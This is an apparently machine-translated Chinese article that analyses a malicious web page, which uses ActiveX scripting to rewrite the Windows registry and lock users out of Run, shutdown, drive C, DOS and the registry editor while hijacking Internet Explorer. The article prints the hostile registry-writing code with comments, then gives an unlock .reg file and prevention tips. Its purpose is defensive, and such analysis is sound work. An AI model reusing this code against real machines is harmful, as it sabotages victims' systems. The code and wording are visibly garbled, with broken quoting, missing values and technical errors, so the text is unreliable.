Browse the Web page registry has been modified by the mystery and solutions _ registration Form

Browsing the web will be modified by the registry? True! If you have browsed to the following page: http://www. com/default.htm, you really have a feeling of dying!

Access to this page will be:

1. Modify Start Menu

1) Prohibit "shutdown system"
2) prohibit "Run"
3) prohibit "cancellation"

2. Hide C-You can't find your C disk

3. Disable the use of Registry Editor regedit

4. Prohibit the use of DOS programs

5. Make the system inaccessible to "real mode"

6. Prohibit running of any program

7. Change the homepage of IE browser to http://www. So-and-So com/, and also be added to the Web site in the Favorites folder.

So how do these functional horror functions work? It turns out that the Web page was an ActiveX Web page file that was made with Java technology that contained unwanted code. To get more people to understand its hazards, I looked at its source code, listed its main parts, and added a detailed comment (the note in the text is part of the comment I added).

Note: The following code is to change your IE default connection home to http://www. So-and-So. com/
Shl.regwrite ("Hkcu\\software\\microsoft\\internet explorer\\main\\
Start Page "," http://www. So-and-So com/");

Note: The following are the tricks used by the Web page to modify the victim's registry entries

Shl.regwrite ("Hkcu\\software\\microsoft\\windows\\currentversion
\\Policies\\Explorer\\NoRun ",", "reg_binary");
Note: There is no "run" item on the victim system so that users cannot modify the system registry by using Registry Editor.

Shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\
Policies\\explorer\\noclose ",", "reg_binary");
Note: There is no "shut down system" entry for the victim system

Shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\
Policies\\explorer\\nologoff ",", "reg_binary");
Note: The victim system is not "unregistered"

Shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\
Policies\\explorer\\nodrives "," 00000004 "," REG_DWORD ");
Note: Make the victim system without logical drive C

Shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\
Policies\\winoldapp\\ Disabled "," reg_binary ");
Note: Prohibit all DOS applications from running;

Shl.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\
Policies\ \winoldapp\\norealmode "," reg_binary ");
Note: Enable the system to not boot to the "real mode" (traditional DOS mode);

Also note: When you go to the Web page, it also modifies the following registry key to display a login window when the Windows system logs on (before the Microsoft Network user logs on)

Shl.regwrite ("hklm\\software\\microsoft\\windows\\currentversion\\
Winlogon\\legalnoticecaption "," Woo la la ... ");
Note: The code will cause the window title to be "Woo la La ..."

Shl.regwrite ("hklm\\software\\microsoft\\windows\\currentversion\\
Winlogon\\legalnoticetext "," welcome you! You're such a super big idiot! "Woo La La ..." the story began, as determined into the miserable world ");
Note: The above line is the text that will appear in the window

Note: The following two lines of code modify the registry so that all of the victim's IE windows are added with the following title: "Woo La La ..."

Shl.regwrite ("Hklm\\software\\microsoft\\internet explorer\\main\\
Window Title "," Woo la la ... ");
Shl.regwrite ("Hkcu\\software\\microsoft\\internet explorer\\main\\
Window Title "," Woo la la ... ");
Note: All modifications to the victim's registry have been completed by the previous line!

Note: The following code is used to add its web page to the victim's favorites

var WF, Shor, loc;
WF = FSO. GetSpecialFolder (0);
LOC = WF + "\\Favorites";
if (! Fso. FolderExists (Loc))
{
loc = FSO. GetDriveName (WF) + "\\Documents and Settings\\
"+ Net.username +" \\Favorites ";
if (! Fso. FolderExists (Loc))
{
Return
}
}

Note: The following is the specific code that adds the Web page to your favorites
Addfavlnk (Loc, "find sense www. so-and. com", "http://www. xxx. com");

Since the code is simple and annotated, I'm sure you've seen what's going on. So what if you accidentally enter the webpage and have already recruited it? Don't worry, here is a list of ways to solve it.

How to fix an injured user:

1: For Win9x users, it is recommended to press F8 when the computer is started, select to MS-DOS, and use the Scanreg/restore command to restore the previously backed up, normal registry.

2: For Win2000 users, the following content copy down, save as Unlock.reg file, select the security mode with command line, with command regedit unlock.reg import, how to restart the machine OK.

The contents of the Unlock.reg file are as follows:

Windows Registry Editor Version 5.00

[hkey_current_user\software\microsoft\windows\currentversion\
Policies\explorer]
"NoDriveTypeAutoRun" =dword:00000095
"NoRun" =hex:
"Nologoff" =hex:
"NoDrives" =dword:00000000
"Restrictrun" =dword:00000000

[hkey_current_user\software\microsoft\windows\currentversion\
Policies\system]
"DisableRegistryTools" =dword:00000000

[hkey_current_user\software\microsoft\windows\currentversion\
Policies\system]
"DisableRegistryTools" =dword:00000000

[hkey_current_user\software\microsoft\windows\currentversion\
Policies\winoldapp]
"Disabled" =dword:00000000

[hkey_current_user\software\microsoft\windows\currentversion\
Policies\winoldapp]
"Norealmode" =dword:00000000

[hkey_local_machine\software\microsoft\windows\currentversion\
Winlogon]
"LegalNoticeCaption" = ""
"LegalNoticeText" = ""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title" = "IE Browser"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title" = "IE Browser"

Preventive measures:

1. To avoid the strokes, the key is not to easily go to some of their own do not understand the site.

2. In IE settings, ActiveX Plug-ins and controls, Java script, and so on all prohibit

3. Can be upgraded to the latest virus library to prevent this kind of malicious Web page infringement.

4. Now that the Web page is destroying our system by modifying the registry, we can lock the registry in advance: Prohibit modification of the registry so that it can be used for prevention purposes. But what do you do with Registry Editor Regedit.exe? So we have to prepare a "key" in advance to open this "lock"!

The lock method is as follows:

(1) Run Registry Editor Regedit.exe;
(2) Expand the registry to hkey_current_user\software\microsoft\windows\currentversion\
Policies\system, create a new DWORD value named DisableRegistryTools and change its value to "1" to prevent the use of Registry Editor Regedit.exe.

The Unlock method is as follows:

Edit a. reg file of any name with Notepad, such as Unlock.reg, as follows:

REGEDIT4

[hkey_current_user\software\microsoft\windows\currentversion\
Policies\system]
"DisableRegistryTools" =dword:00000000

Save. You've got a key to unlock it! If you want to use Registry Editor, double-click Unlock.reg. Note that, after "REGEDIT4" must be empty line, and "REGEDIT4" in the "4" and "T" between must not have spaces, otherwise will be naught!

Description: The "Million Flower Valley" Web page of malicious code damage, can also be mentioned above the method to prevent, after the recruit can also refer to the above method to solve. Another, KV3000 to "million Flower Valley" can be fully restored to the Web page described in this article damage system phenomenon, it can not be safely restored.